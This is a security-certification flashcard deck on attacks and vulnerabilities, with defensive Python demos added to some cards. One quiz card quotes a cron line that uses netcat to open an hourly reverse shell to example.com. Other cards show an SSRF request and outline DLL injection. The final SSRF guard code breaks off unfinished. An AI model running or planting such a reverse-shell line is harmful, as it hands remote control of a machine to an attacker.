Chap 1 and Chap 2 Flashcards

Threats, Attacks and Vulnerabilities Architecture and Design (209 cards)

1
Q

Chap1-8: Susan is analyzing the source code for an application and discovers a pointer dereference that returns NULL. This causes the program to attempt to read from the NULL pointer and results in a segmentation fault. What impact could this have for the application?

A- A data breach
B- A denial-of-service condition
C- Permissions creep
D- Privilege escalation

A

B- A denial-of-service condition

2
Q

Chap1-10: Rick wants to make offline brute force attacks against his password file very difficult for attackers. Which of the following is not a common technique to make passwords harder to crack?

A- Use of a Salt
B- Use of a Pepper
C- Use of a purpose built password hashing algorithm
D- Encrypting password plain text using symmetric encryption

A

D- Encrypting password plain text using symmetric encryption

3
Q

Chap1-13: Chris needs visibility into connection attempts through a firewall because he believes that a TCP handshake is not properly occurring. What security information and event management (SIEM) capability is best suited to troubleshooting this issue?

A- Reviewing reports
B- Packet Capture
C- Sentiment Analysis
D- Log collection and Analysis

A

B- Packet Capture

4
Q

Chap 1-20: You have been asked to test your company network for security issues. The specific test you are conducting involves primarily using automated and semiautomated tools to look for known vulnerabilities with the various systems on your network. Which of the following best describes this test?

A- Vulnerability scan
B- Penetration test
C- Security audit
D- Security test

A

A- Vulnerability scan

5
Q

Chap 1-24: The organization that Mike works in finds that one of its domains is directing traffic to a competitor's website. When Mike checks, the domain information has been changed, including the contact and other administrative details for the domain. If the domain had not expired, what has most likely occurred?

A- DNS hijacking
B- An on-path attack
C- Domain hijacking
D- A zero-day attack

A

C- Domain hijacking

6
Q

Chap 1-30: Alice wants to prevent SSRF attacks. Which of the following will not be helpful for preventing them?

A- Removing all SQL code from submitted HTTP queries
B- Blocking hostnames like 127.0.0.1 and localhost
C- Blocking sensitive URLs like /admin
D- Applying whitelist-based input filters

A

A- Removing all SQL code from submitted HTTP queries

7
Q

Chap 1-34: While investigating a malware outbreak on your company network, you discover something very odd. There is a file that has the same name as a Windows system DLL, and it even has the same API interface, but it handles input very differently, in a manner that helps compromise the system, and it appears that applications have been attaching to this file rather than the real system DLL. What best describes this?

A- Shimming
B- Trojan Horse
C- Backdoor
D- Refactoring

A

A- Shimming

In this context a shim is a small library inserted between an application and the operating system (or a system DLL) so that API calls pass through it first. Shims exist legitimately for backward compatibility (the Windows Application Compatibility framework), which is why an attacker can use the same mechanism to intercept an API, change the arguments passed, redirect the call, or tamper with the data returned, and to maintain persistence entirely from user space without kernel-level access. Defenders should monitor for unexpected shim databases and for DLLs that shadow system libraries. The "shimmer" devices found inserted into ATM card slots since 2015 to read EMV chip cards share the name but are a physical skimming technique, not the software shim described here.

8
Q

Chap 1-38: Why is SSL stripping a particular danger with open WiFi networks?

A- WPA2 is not secure enough to prevent this.
B- Open hotspots do not assert their identity in a secure way.
C- Open hotspots can be accessed by any user
D- 802.11ac is insecure and traffic can be redirected

A

B- Open hotspots do not assert their identity in a secure way.

9
Q

Chap 1-45: Dennis uses an on-path attack to cause a system to send HTTPS traffic to his system and then forwards it to the actual server the traffic is intended for. What type of password attack can he conduct with the data he gathers if he captures all traffic from a login form?

A- A plain text password attack
B- A pass-the-hash attack
C- A SQL injection attack
D- A cross site scripting attack

A

A- A plain text password attack

10
Q

Chap 1-50: Your Wireless network has been breached. It appears the attacker modified a portion of data used with the stream cipher and used this to expose wirelessly encrypted data. What is this attack called?

A- Evil twin
B- Rogue WAP
C- IV Attack
D- WPS Attack

A

C- IV Attack

An initialization vector (IV) attack targets WEP-protected wireless networks. WEP combines a short 24-bit IV, sent in the clear, with the static network key to seed the RC4 stream cipher, so the same keystream is reused once enough packets have been captured. Once an attacker learns (or can inject) the plaintext of one packet, they can recover the RC4 keystream for that IV and decrypt any other packet encrypted under the same IV; with enough IV/keystream pairs the WEP key itself can be recovered.

11
Q

Chap 1-57: John has discovered that an attacker is trying to get network passwords by using software that attempts a number of passwords from a list of common passwords. What type of attack is this?

Dictionary
Rainbow Table
Brute Force
Session Hijacking

A

Dictionary

12
Q

Chap 1-65 Matt discovers that a system on his network is sending hundreds of Ethernet frames to the switch it is connected to, with each frame containing a different source MAC address. What type of attack has he discovered?

Etherspam
MAC flooding
Hardware spoofing
MAC Hashing

A

MAC Flooding
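The following added example (not from the original flashcard set) shows the switch-side detection logic that catches this attack: it counts how many distinct source MAC addresses appear on each port inside a sliding time window and flags ports that exceed a threshold. The port names, window size, threshold and the frame observations are all constructed for the example.

```python
from collections import defaultdict, deque

def detect_mac_flood(events, window_s=10.0, threshold=50):
    """Sliding-window count of distinct source MACs per switch port.

    events: iterable of (t_seconds, port, src_mac) observations, e.g. parsed from
    a SPAN capture or the switch's MAC-table logs.
    Returns (peak_per_port, flooded_ports): the highest number of distinct source
    MACs seen on each port within any window, and the ports over the threshold.
    A normal access port carries a handful of MACs; hundreds of fresh MACs in a
    few seconds is the signature of a CAM-table flooding tool.
    """
    recent = defaultdict(deque)   # port -> deque of (t, mac) still inside the window
    peak = defaultdict(int)
    for t, port, mac in sorted(events):          # process observations in time order
        q = recent[port]
        q.append((t, mac))
        while q and t - q[0][0] > window_s:      # expire observations that left the window
            q.popleft()
        distinct = len({m for _, m in q})
        if distinct > peak[port]:
            peak[port] = distinct
    flooded = sorted(p for p, n in peak.items() if n > threshold)
    return dict(peak), flooded

def constructed_events():
    """Constructed sample: one healthy port and one port being flooded."""
    events = []
    stations = ["aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02", "aa:bb:cc:00:00:03"]
    for i in range(90):                          # three stations chatting for 30 s on Gi1/0/3
        events.append((i / 3.0, "Gi1/0/3", stations[i % 3]))
    for i in range(300):                         # 300 frames in 3 s on Gi1/0/7, each with a new source MAC
        events.append((10.0 + i / 100.0, "Gi1/0/7", f"02:00:00:00:{i >> 8:02x}:{i & 0xff:02x}"))
    return events

if __name__ == "__main__":
    peak, flooded = detect_mac_flood(constructed_events())
    print(peak, flooded)
```

The preventive control is port security on the switch (a per-port maximum number of learned MAC addresses, with the port shut down or the excess dropped when it is exceeded); the detection above is what you run when that is not configured everywhere.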

13
Q

Chap 1-71: Amanda scans a Red Hat Linux server that she believes is fully patched and discovers that the Apache version on the server is reported as vulnerable to an exploit from a few months ago. When she checks to see if she is missing patches, Apache is fully patched. What has occurred?

A false positive
An automatic update failure
A false negative
An Apache version mismatch

A

A false positive

This is a false positive: the scanner reports a vulnerability that is not actually present. Enterprise Linux vendors such as Red Hat routinely backport security fixes into the existing package without changing the upstream version string, so a scanner that relies on the version banner alone keeps flagging a fully patched Apache as vulnerable. A false negative is the opposite error: reporting a system as clean when it is actually vulnerable. Automatic updates were not mentioned, nor was a specific Apache version. To confirm, compare the installed package's changelog (rpm -q --changelog httpd) or the vendor's CVE advisory against the scanner finding rather than trusting the version banner.

14
Q

Chap 1-79: Your company has hired an outside security firm to perform various tests of your network. During the vulnerability scan, you will provide the company with logins for various systems (e.g., database server, application server, web server) to aid in their scan. What best describes this?

A known environment Test
A gray-box test
A credentialed scan
An intrusive scan

A

A credentialed scan

15
Q

Chap 1-85: Elizabeth is investigating a network breach at her company. She discovers that a program was able to execute code within the address space of another process by using the target process to load a specific library. What best describes this attack?

Logic Bomb
Session Hijacking
Buffer Overflow
DLL Injection

A

DLL Injection

In a DLL injection attack, the attacker forces a target process to load a dynamic-link library of the attacker's choosing (for example by writing the library path into the process's memory and creating a remote thread that calls LoadLibrary), so the injected code runs inside that process's address space and with its privileges. Session hijacking is incorrect because it takes over an existing authenticated session rather than a process; a buffer overflow corrupts memory adjacent to a fixed-size buffer; a logic bomb is code that triggers on a condition such as a date.

16
Q

Chap 1-87: What is the primary difference between an intrusive and non-intrusive vulnerability scan?

An intrusive scan is a penetration test
A non- intrusive scan is just a document check
An intrusive scan could potentially disrupt operations
A non-intrusive scan won’t find most vulnerabilities

A

An intrusive scan could potentially disrupt operations

17
Q

Chap 1-90: What two techniques are most commonly associated with a pharming attack?

Modifying the hosts file on a PC or exploiting a DNS vulnerability on a trusted DNS server
Phishing many users and harvesting email addresses from them
Phishing many users and harvesting passwords from them
Spoofing DNS server IP addresses or modifying the hosts file on a PC

A

Modifying the hosts file on a PC or exploiting a DNS vulnerability on a trusted DNS server

Pharming attempts to redirect traffic intended for a legitimate site to another malicious site. Attackers most often do this by changing the local hosts file or by exploiting a trusted DNS server

18
Q

Chap 1-96 What type of attack involves adding an expression or phrase such as adding “SAFE” to mail headers?

Pretexting
Phishing
SQL Injection
Prepending

A

Prepending

19
Q

Prepending

A

Not commonly used outside CompTIA material; can mean one of three things:

1- Adding an expression or phrase to an email subject line or headers to protect or fool users
2- Adding data as part of an attack
3- Social Engineers may prepend information by inserting it into a conversation to get targets to think about things the attacker wants them to

20
Q

Chap 1-97: Charles wants to ensure that his outsourced code development efforts are as secure as possible. Which of the following is not a common practice to ensure secure remote code development?

Ensure developers are trained on secure coding techniques
Set defined acceptance criteria for code security
Test code using automated and manual security testing systems
Audit all underlying libraries used in the code

A

Audit all underlying libraries used in the code

21
Q

Chap 1-104: Valerie is responsible for security testing applications in her company. She has discovered that a web application, under certain conditions, can generate a memory leak. What type of attack would this leave the application vulnerable to?

DoS
Backdoor
SQL Injection
Buffer Overflow

A

DoS

22
Q

Chap 1-105: The mobile game that Jack has spent the last year developing has been released, and malicious actors are sending traffic to the server that runs it to prevent it from competing with other games in the App Store. What type of denial-of-service attack is this?

Network DoS
Operational Technology DDoS
GDos
Application DDos

A

Application DDoS

This is an example of an application DDoS aimed at a gaming application. A network DDoS would be aimed at network technology, either the devices or protocols that underly networks. An operational technology (OT) DDoS targets SCADA, ICS, utility or similar operational systems. GDoS does not exist

23
Q

Pepper

A

In cryptography, a pepper is a secret added to an input such as a password during hashing with a cryptographic hash function. It differs from a salt in that it is not stored alongside the password hash; the pepper is kept separately in some other medium, such as a hardware security module. Note that NIST never refers to this value as a pepper but rather as a secret salt. A pepper is similar in concept to a salt or an encryption key. It is like a salt in that it is a randomized value added to the password hash, and it is like an encryption key in that it must be kept secret. While a salt is not secret (merely unique) and can be stored alongside the hashed output, a pepper is secret and must not be stored with the output. The hash and salt are usually stored in a database, but a pepper must be stored separately so that an attacker who breaches the database does not obtain it. Where the salt only has to be long enough to be unique per user, a pepper should be long enough to remain secret against brute-force attempts to discover it (NIST recommends at least 112 bits).

24
Q

Segmentation Fault

A

In computing, a segmentation fault (often shortened to segfault) or access violation is a fault, or failure condition, raised by hardware with memory protection, notifying the operating system (OS) that the software has attempted to access a restricted area of memory (a memory access violation). On standard x86 computers, this is a form of general protection fault. The operating system kernel will, in response, usually perform some corrective action, generally passing the fault on to the offending process by sending it a signal. Processes can in some cases install a custom signal handler, allowing them to recover on their own, but otherwise the OS default signal handler is used, generally causing abnormal termination of the process (a program crash), and sometimes a core dump.

25
Passive Reconnaissance
Any reconnaissance done without actually connecting to the target. In the example, OSINT (open source intelligence) is conducted when a user uses commonly available third-party information sources to collect information about the target.
26
Active Reconnaissance
Involves communicating with the target network, e.g.: port scan
27
SSRF
Server-Side Request Forgery: https://www.imperva.com/learn/application-security/server-side-request-forgery-ssrf/#ImpervaResources . An SSRF attack involves an attacker abusing server functionality to make the server itself send requests to resources the attacker could not reach directly, such as internal services, localhost, or cloud instance-metadata endpoints. The attacker targets an application that fetches or imports data from user-supplied URLs; the URL can be replaced with an internal one or its path tampered with. SSRF is distinct from XSRF/CSRF (cross-site request forgery), in which the attacker makes a victim's browser send a request to a site where the victim is already authenticated.
30
DLL Injection
DLL injection is a technique used for running code within the address space of another process by forcing it to load a dynamic-link library. DLL injection is often used by external programs to influence the behavior of another program in a way its authors did not anticipate or intend. For example, the injected code could hook system function calls, or read the contents of password textboxes, which cannot be done the usual way. A program used to inject arbitrary code into arbitrary processes is called a DLL injector.
31
OpenVAS
open source vulnerability scanner
32
Birthday Attack
A birthday attack is a type of cryptographic attack that exploits the mathematics behind the birthday problem in probability theory. It can be used to abuse communication between two or more parties. The attack depends on the higher likelihood of collisions between random attack attempts and a fixed number of possible outputs (pigeonholes). With a birthday attack, a collision in an n-bit hash function can be found with roughly 2^(n/2) work, compared with the 2^n work of the classical brute-force preimage attack, which is why a hash needs an output twice as long as its intended collision-resistance security level. There is a general (though disputed) result that quantum computers can perform birthday attacks faster still, further weakening collision resistance.
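Added example (not from the original flashcard set) that makes the 2^(n/2) versus 2^n gap concrete: SHA-256 truncated to n bits stands in for a short hash, a birthday search stores every digest seen and stops at the first repeat, and a brute-force preimage search is included for comparison. The message prefixes are arbitrary choices for the example.

```python
import hashlib
import math
from itertools import count

def truncated_hash(data, bits):
    """SHA-256 truncated to its first `bits` bits, standing in for a short hash."""
    digest = hashlib.sha256(data).digest()
    return int.from_bytes(digest, "big") >> (256 - bits)

def expected_birthday_trials(bits):
    """Mean number of random inputs before two share an n-bit hash: sqrt(pi/2 * 2**n)."""
    return math.sqrt(math.pi / 2 * 2 ** bits)

def find_collision(bits, prefix=b"msg-"):
    """Birthday search: remember every digest seen, stop at the first repeat.
    Returns (message_a, message_b, hashes_computed); expected cost ~2**(bits/2)."""
    seen = {}
    for i in count():
        m = prefix + str(i).encode()
        h = truncated_hash(m, bits)
        if h in seen:
            return seen[h], m, i + 1
        seen[h] = m

def find_preimage(target, bits, prefix=b"pre-"):
    """Brute-force preimage search for comparison: about 2**bits hashes on average."""
    for i in count():
        m = prefix + str(i).encode()
        if truncated_hash(m, bits) == target:
            return m, i + 1

if __name__ == "__main__":
    bits = 32
    a, b, n = find_collision(bits)
    print(f"{bits}-bit collision after {n} hashes "
          f"(birthday estimate ~{expected_birthday_trials(bits):.0f}, preimage would need ~{2 ** bits})")
    print(a, b, hex(truncated_hash(a, bits)))
```

Run it with bits=32 and the collision appears after some tens of thousands of hashes, while a 32-bit preimage would need on the order of four billion; the same ratio is why MD5 (128 bits) offers only 64-bit collision resistance and why a 256-bit hash is the floor for 128-bit security.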
33
Chap 1-108: When a multithreaded application does not properly handle various threads accessing a common value, and one thread can change the data while another thread is relying on it, what flaw is this?
Memory Leak
Buffer Overflow
Integer Overflow
Time of Check/Time of Use

Time of Check/Time of Use. In software development, time-of-check to time-of-use (TOCTOU, TOCTTOU or TOC/TOU) is a class of bugs caused by a race condition between checking the state of part of a system (such as a security credential or a shared value in memory) and using the result of that check. If the check and the use are not made atomic, another thread can change the value in between, so the program acts on stale data.
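Added example (not from the original flashcard set) of the flaw above and its fix, using a bank-balance check as the shared value. A threading barrier stands in for an unlucky scheduler so that the bad interleaving happens deterministically; the account and amounts are constructed for the example.

```python
import threading

class Account:
    """Shared state touched by several threads."""
    def __init__(self, balance):
        self.balance = balance
        self.lock = threading.Lock()

def withdraw_racy(acct, amount, barrier):
    """Check, then use, with nothing holding the two together.
    The barrier makes every thread finish its check before any thread acts,
    which is exactly the interleaving the bug needs."""
    if acct.balance >= amount:          # time of check (unprotected)
        barrier.wait()
        with acct.lock:                 # the update itself is atomic...
            acct.balance -= amount      # ...but the check it relied on is now stale
        return True
    barrier.wait()
    return False

def withdraw_safe(acct, amount, barrier):
    """Check and use inside one critical section, so no other thread can
    change the balance between the two."""
    barrier.wait()                      # threads still arrive at the same moment...
    with acct.lock:                     # ...but the lock serialises check-and-use
        if acct.balance >= amount:
            acct.balance -= amount
            return True
        return False

def run(withdraw, balance=100, amount=100, threads=2):
    """Run `threads` concurrent withdrawals; return (final balance, sorted results)."""
    acct = Account(balance)
    barrier = threading.Barrier(threads)
    results = []
    workers = [threading.Thread(target=lambda: results.append(withdraw(acct, amount, barrier)))
               for _ in range(threads)]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    return acct.balance, sorted(results)

if __name__ == "__main__":
    print("racy:", run(withdraw_racy))   # two withdrawals of 100 from a balance of 100
    print("safe:", run(withdraw_safe))
```

Note that locking only the write (as withdraw_racy does) is not enough; the lock has to span the check and the use. The file-system variant of the same bug is checking a path with access() or stat() and then opening it: the fix there is to open first and inspect the descriptor you actually got.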
34
Chap 1-112: Adam wants to download lists of malicious or untrustworthy IP addresses and domains using STIX and TAXII. What type of service is he looking for?
A vulnerability feed
A threat feed
A hunting feed
A rule feed

A threat feed
35
TAXII
TAXII, short for Trusted Automated eXchange of Intelligence Information, defines how cyber threat information can be shared via services and message exchanges. It is designed specifically to carry STIX content, which it does by defining an API that aligns with common sharing models. The three principal sharing models are:
Hub and spoke: one central repository of information
Source/subscriber: one single source of information
Peer-to-peer: multiple groups share information
TAXII 1.x defines four services; users can implement as many as they require and combine them for different sharing models:
Discovery: a way to learn what services an entity supports and how to interact with them
Collection Management: a way to learn about and request subscriptions to data collections
Inbox: a way to receive content (push messaging)
Poll: a way to request content (pull messaging)
36
STIX
STIX, short for Structured Threat Information eXpression, is a standardized language, developed by MITRE and now maintained by the OASIS Cyber Threat Intelligence (CTI) Technical Committee, for describing cyber threat information (STIX 2.x objects are JSON). It has been adopted as an international standard by various intelligence-sharing communities and organizations. It is designed to be shared via TAXII but can be shared by other means. STIX is structured so that users can describe a threat's:
Motivations
Abilities
Capabilities
Response
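Added example (not from the original flashcard set) of what Adam's threat feed looks like once fetched and how a consumer turns it into a blocklist, covering the three cards above. The bundle below is a constructed STIX 2.1 document with made-up IDs and documentation-range addresses; in practice it would come from a TAXII 2 collection via a client library, and the parsing is the same.

```python
import json
import re

# Constructed STIX 2.1 bundle standing in for one page of a TAXII collection.
SAMPLE_BUNDLE = json.dumps({
    "type": "bundle",
    "id": "bundle--00000000-0000-4000-8000-0000000000aa",
    "objects": [
        {"type": "indicator", "spec_version": "2.1",
         "id": "indicator--00000000-0000-4000-8000-000000000001",
         "created": "2024-01-10T12:00:00.000Z", "modified": "2024-01-10T12:00:00.000Z",
         "name": "C2 addresses", "pattern_type": "stix",
         "pattern": "[ipv4-addr:value = '198.51.100.23' OR ipv4-addr:value = '198.51.100.24']",
         "valid_from": "2024-01-10T12:00:00Z"},
        {"type": "indicator", "spec_version": "2.1",
         "id": "indicator--00000000-0000-4000-8000-000000000002",
         "created": "2024-01-11T09:30:00.000Z", "modified": "2024-01-11T09:30:00.000Z",
         "name": "Phishing domain", "pattern_type": "stix",
         "pattern": "[domain-name:value = 'login-update.example']",
         "valid_from": "2024-01-11T09:30:00Z"},
        {"type": "indicator", "spec_version": "2.1",
         "id": "indicator--00000000-0000-4000-8000-000000000003",
         "created": "2023-06-01T00:00:00.000Z", "modified": "2024-02-01T00:00:00.000Z",
         "name": "Retired sinkhole", "pattern_type": "stix", "revoked": True,
         "pattern": "[ipv4-addr:value = '203.0.113.9']",
         "valid_from": "2023-06-01T00:00:00Z"},
        {"type": "malware", "spec_version": "2.1",
         "id": "malware--00000000-0000-4000-8000-000000000004",
         "created": "2024-01-10T12:00:00.000Z", "modified": "2024-01-10T12:00:00.000Z",
         "name": "ExampleRAT", "is_family": True},
    ],
})

# Matches the simple comparison expressions used in STIX patterns, e.g. ipv4-addr:value = '1.2.3.4'
OBSERVABLE_RE = re.compile(r"(ipv4-addr|ipv6-addr|domain-name|url):value\s*=\s*'([^']+)'")

def extract_blocklist(bundle_json):
    """Return {observable_type: set(values)} from every live STIX-pattern indicator in a bundle.
    Revoked indicators and non-indicator objects (malware, threat-actor, ...) are skipped."""
    bundle = json.loads(bundle_json)
    blocklist = {}
    for obj in bundle.get("objects", []):
        if obj.get("type") != "indicator" or obj.get("revoked") or obj.get("pattern_type") != "stix":
            continue
        for kind, value in OBSERVABLE_RE.findall(obj["pattern"]):
            blocklist.setdefault(kind, set()).add(value.lower())
    return blocklist

def is_blocked(blocklist, kind, value):
    """Look up one observed value (an IP from a firewall log, a domain from DNS logs)."""
    return value.lower() in blocklist.get(kind, set())

if __name__ == "__main__":
    bl = extract_blocklist(SAMPLE_BUNDLE)
    print(bl)
    print(is_blocked(bl, "ipv4-addr", "198.51.100.23"), is_blocked(bl, "ipv4-addr", "203.0.113.9"))
```

The revoked indicator is deliberately included: a feed consumer that ignores the revoked flag (and valid_until, when present) keeps blocking addresses that have been returned to legitimate use.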
37
Chap 1-123: John has been asked to do a penetration test of a company. He has been given general information but no details about the network. What kind of test is this?
Partially Known Environment
Known Environment
Unknown Environment
Masked

Partially Known Environment
38
Chap 1-124: Under which type of attack does an attacker's system appear to be the server to the real client and the client to the real server?
Denial-of-service
Replay
Eavesdropping
On-Path

On-Path
39
On-Path Attack
An on-path attack (formerly called a man-in-the-middle attack) is one in which the attacker sits between two communicating parties and can intercept, read and sometimes modify the data flowing between them, without either party being aware that anyone else is in the conversation. The attacker captures the original data stream, inspects or alters it, and then passes it on to the intended destination, so they can read everything going back and forth between the two devices and may also tamper with it in transit.
40
Chap 1-125: You are a security administrator for Acme Corporation. You have discovered malware on some of your company's machines. This malware seems to intercept calls from the web browser to libraries, and then manipulates the browser calls. What type of attack is this?
Man in the Browser
On-Path Attack
Buffer Overflow
Session Hijacking

Man in the Browser
41
Chap 1-127: You are responsible for software testing at Acme Corporation. You want to check all software for bugs that might be used by an attacker to gain entrance into the software on your network. You have discovered a web application that would allow a user to attempt to put a 64-bit value into a 4-byte integer variable. What is this type of flaw?
Memory overflow
Buffer overflow
Variable overflow
Integer overflow

Integer overflow. Memory overflow is incorrect (the related flaw is a memory leak); variable overflow isn't a real term; buffer overflow deals with writing past the bounds of an array or buffer.
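Added example (not from the original flashcard set) that emulates the 4-byte integer from the card: storing a 64-bit value into a signed 32-bit slot keeps only the low 32 bits, and the classic consequence is a size computation that wraps to a tiny number and yields an undersized buffer. The checked variants show the fix. Python integers never overflow, so the wrap is emulated explicitly.

```python
import struct

INT32_MIN, INT32_MAX = -(2 ** 31), 2 ** 31 - 1

def store_unchecked_int32(value):
    """Emulate assigning an arbitrary integer to a C `int`: keep the low 32 bits,
    then reinterpret the result as two's-complement signed."""
    wrapped = value & 0xFFFFFFFF
    return wrapped - 2 ** 32 if wrapped & 0x80000000 else wrapped

def fits_int32(value):
    return INT32_MIN <= value <= INT32_MAX

def store_checked_int32(value):
    """The fix: refuse the value instead of silently truncating it.
    struct.pack performs the same range check natively and raises struct.error."""
    if not fits_int32(value):
        raise OverflowError(f"{value} does not fit in a signed 32-bit integer")
    return struct.unpack("<i", struct.pack("<i", value))[0]

def buffer_size_unchecked(count, item_size):
    """count * item_size computed in 32-bit arithmetic: the classic path from an
    integer overflow to an undersized allocation and a later heap overflow."""
    return store_unchecked_int32(count * item_size)

def buffer_size_checked(count, item_size):
    """Validate the product before it is ever used as an allocation size."""
    return store_checked_int32(count * item_size)

if __name__ == "__main__":
    print(store_unchecked_int32(2 ** 64 - 1))    # -1: a 64-bit value collapses to its low 32 bits
    print(buffer_size_unchecked(0x40000001, 4))  # 4: a request for ~1G items is sized as 4 bytes
```

The 0x40000001 * 4 case is the one to remember: the multiplication is "correct", the stored result is 4, and every later write into the buffer is an overflow.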
42
Cross-Site Scripting (XSS)
XSS Attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
43
What is IRC's default port?
TCP port 6667
44
Smishing
Phishing via SMS (text message)
45
Chap 1-146: Tracy is concerned about LDAP injection attacks against her directory server. Which of the following is not a common technique to prevent LDAP injection?
Secure configuration of LDAP
User input validation
LDAP query parameterization
Output filtering rules

LDAP query parameterization
46
Chap 1-149: What is the most significant difference between cloud service-based and on-premises vulnerabilities?
Your ability to remediate it yourself
The severity of the vulnerability
The time required to remediate
Your responsibility for compromised data

Your ability to remediate it yourself. Vulnerabilities in cloud services require the cloud service provider to remediate them; you can remediate most vulnerabilities in your own infrastructure yourself without a third party.
47
Chap 1-162: A penetration tester called a help desk staff member at the company that Charles works at and claimed to be a senior executive who needed her password changed immediately due to an important meeting that would happen in a few minutes. The staff member changed the executive's password to a password that the penetration tester provided. What social engineering principle did the penetration tester leverage to accomplish this attack?
Intimidation
Scarcity
Urgency
Trust

Urgency
48
Chap 1-161: Amanda encounters a Bash script that runs the following command:
crontab -e
0 * * * * nc example.com 8989 -e /bin/bash
What does this command do?
It checks the time every hour
It pulls data from example.com every minute
It sets up a reverse shell
None of the above

It sets up a reverse shell. The cron entry runs at minute 0 of every hour and uses netcat to connect out to example.com on TCP port 8989 with /bin/bash attached to the connection, so whoever listens on example.com gets a shell on Amanda's host once an hour. It is a reverse shell because the victim initiates the outbound connection, which is what lets it through a firewall that only blocks inbound traffic.
49
Chap 1-159: You have noticed that when in a crowded area, data from your cell phone is stolen. Later investigation shows a Bluetooth connection to your phone, one that you cannot explain. What describes this attack?
Bluejacking
Bluesnarfing
Evil Twin
RAT

Bluesnarfing
50
Bluesnarfing
Bluesnarfing is a hacking technique in which a hacker accesses a wireless device through a Bluetooth connection. It happens without the device user's permission and often results in the theft of information or some other kind of damage to the device (and user).
51
Bluejacking
It's an attack that sends unsolicited messages to Bluetooth-enabled devices, provided the target is in a certain area.
52
Chap 1-157: What type of attack is the US Trusted Foundry program intended to help prevent?
Critical Infrastructure attacks
Metalwork and casting attacks
Supply chain attacks
Software source code attacks

Supply chain attacks. The US Trusted Foundry program is intended to prevent supply chain attacks by ensuring end-to-end supply chain security for important integrated circuits and electronics.
53
Chap 1-156: What type of attack is an SSL stripping attack?
A brute-force attack
A trojan attack
An on-path attack
A downgrade attack

An on-path attack. (The victim's connection is also downgraded from HTTPS to HTTP, but the downgrade is only possible because the attacker is on the path between victim and server.)
54
SSL stripping
An SSL stripping attack requires the attacker to get the victim to send traffic to them over plain HTTP, while the attacker continues to talk HTTPS to the legitimate server, impersonating the victim. The attacker rewrites the https:// links in the pages they relay so the victim's browser never upgrades. HTTP Strict Transport Security (HSTS), especially with the domain on the browser preload list, defeats the attack because the browser refuses to use plain HTTP for that site at all.
55
Chap 1-155: What two files are commonly attacked using offline brute force attacks?
Windows registry and the Linux /etc/passwd file
Windows SAM and the Linux /etc/passwd file
Windows SAM and the Linux /etc/shadow file
Windows registry and the Linux /etc/shadow file

Windows SAM and the Linux /etc/shadow file
56
Windows SAM
The Security Accounts Manager (SAM) is a database file in Microsoft Windows that stores local account names and their password hashes (LM and NT hashes), not plaintext passwords. The file is locked while Windows is running, so attackers typically obtain it from a volume shadow copy, a backup, or by dumping the SAM and SYSTEM registry hives, and then crack the hashes offline.
57
Linux /etc/shadow
/etc/shadow is the Linux system file that stores password hashes (not encrypted passwords) and password-aging information for each account. It is readable only by root, so that an unprivileged user or attacker cannot copy the hashes out for offline cracking; the world-readable /etc/passwd holds only an "x" placeholder in its password field.
58
Linux /etc/passwd
Traditionally, the /etc/passwd file keeps track of every registered user that has access to a system. It contains a list of the system's accounts, giving for each account information such as user ID, group ID, home directory, login shell and more. The /etc/passwd file must be world-readable, as many utilities use it to map user IDs to user names; write access, however, must be limited to the superuser (root) account.
59
Maneuver
CompTIA defines Maneuver in the context of threat hunting as how to think like a malicious user to help you identify potential indicators of compromise in your environment.
60
Pretexting
Pretexting is a type of social engineering that involves using a false motive and lying to obtain information
61
In the United States, collaborative industry organizations that analyze and share cybersecurity threat information within their industry verticals are known by what term?
IRTs
ISACs
Feedburners
Vertical threat feeds

ISACs
62
IRTs
Incident Response Team
63
ISACs
Information Sharing and Analysis Center: helps critical infrastructure owners and operators protect their facilities, personnel and customers from cyber and physical security threats and other hazards
64
Feedburner
Feedburner is Google's RSS feed management tool
65
Chap 1-178: During a penetration test, Kathleen gathers information, including the organization's domain name, IP address, employee information, phone numbers, email addresses, and similar data. What is this process typically called?
Mapping
Footprinting
Fingerprinting
Aggregation

Footprinting
66
Footprinting
Process of gathering information about a computer system, or network, and it can involve both active and passive techniques
67
Refactoring
Refactoring a program by automated means can include adding additional text, comments, or nonfunctional operations to make the program have a different signature without changing its operations. This is typically not a manual process as anti-malware tools can quickly find new versions. Instead, refactoring is done via a polymorphic or code mutation technique that changes the malware every time it is installed to help avoid signature based systems.
68
Hybrid Warfare
Multipronged attacks conducted as part of a military or national strategy of political warfare that uses traditional, asymmetric and cyberwarfare techniques along with influence methods to achieve goals
69
Chap 1-185: Sarah is reviewing the logs for her web server and sees an entry flagged for review that includes the following HTTP request: ChecinstockAPI=http://localhost/admin.php What type of attack is being attempted?
Cross site scripting attack
Server-side request forgery
Client-side request forgery
SQL injection

Server-side request forgery
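Added example (not from the original flashcard set) of the guard that cards 6, 27 and this one describe: a check applied to any user-supplied URL before the server fetches it. It layers a denylist of localhost and non-routable literal addresses (the "block 127.0.0.1 and localhost" option) under a hostname allowlist, and rejects sensitive paths such as /admin. The allowlisted hosts, permitted scheme and blocked path prefixes are assumptions for the example.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"partner-api.example.net", "cdn.example.net"}   # hypothetical allowlist
ALLOWED_SCHEMES = {"https"}
BLOCKED_PATH_PREFIXES = ("/admin",)
LOCAL_NAMES = {"localhost", "localhost.localdomain"}

def is_internal_literal(host):
    """True if host is an IP literal that is not globally routable
    (loopback, RFC 1918, link-local including 169.254.169.254, IPv6 ::1, ...)."""
    try:
        return not ipaddress.ip_address(host.strip("[]")).is_global
    except ValueError:
        return False   # not an IP literal at all

def check_outbound_url(url):
    """SSRF guard for server-side fetches. Returns (allowed, reason)."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {scheme or '(none)'}"
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL"          # https://allowed-host@evil/ style confusion
    # Layer 1, denylist: catches the obvious localhost / 127.0.0.1 / metadata-service cases.
    if host in LOCAL_NAMES or is_internal_literal(host):
        return False, f"internal target: {host}"
    # Layer 2, allowlist: the only layer that survives encoding tricks (decimal IPs,
    # attacker-controlled DNS names that resolve to 127.0.0.1, and so on).
    if host not in ALLOWED_HOSTS:
        return False, f"host not allowlisted: {host}"
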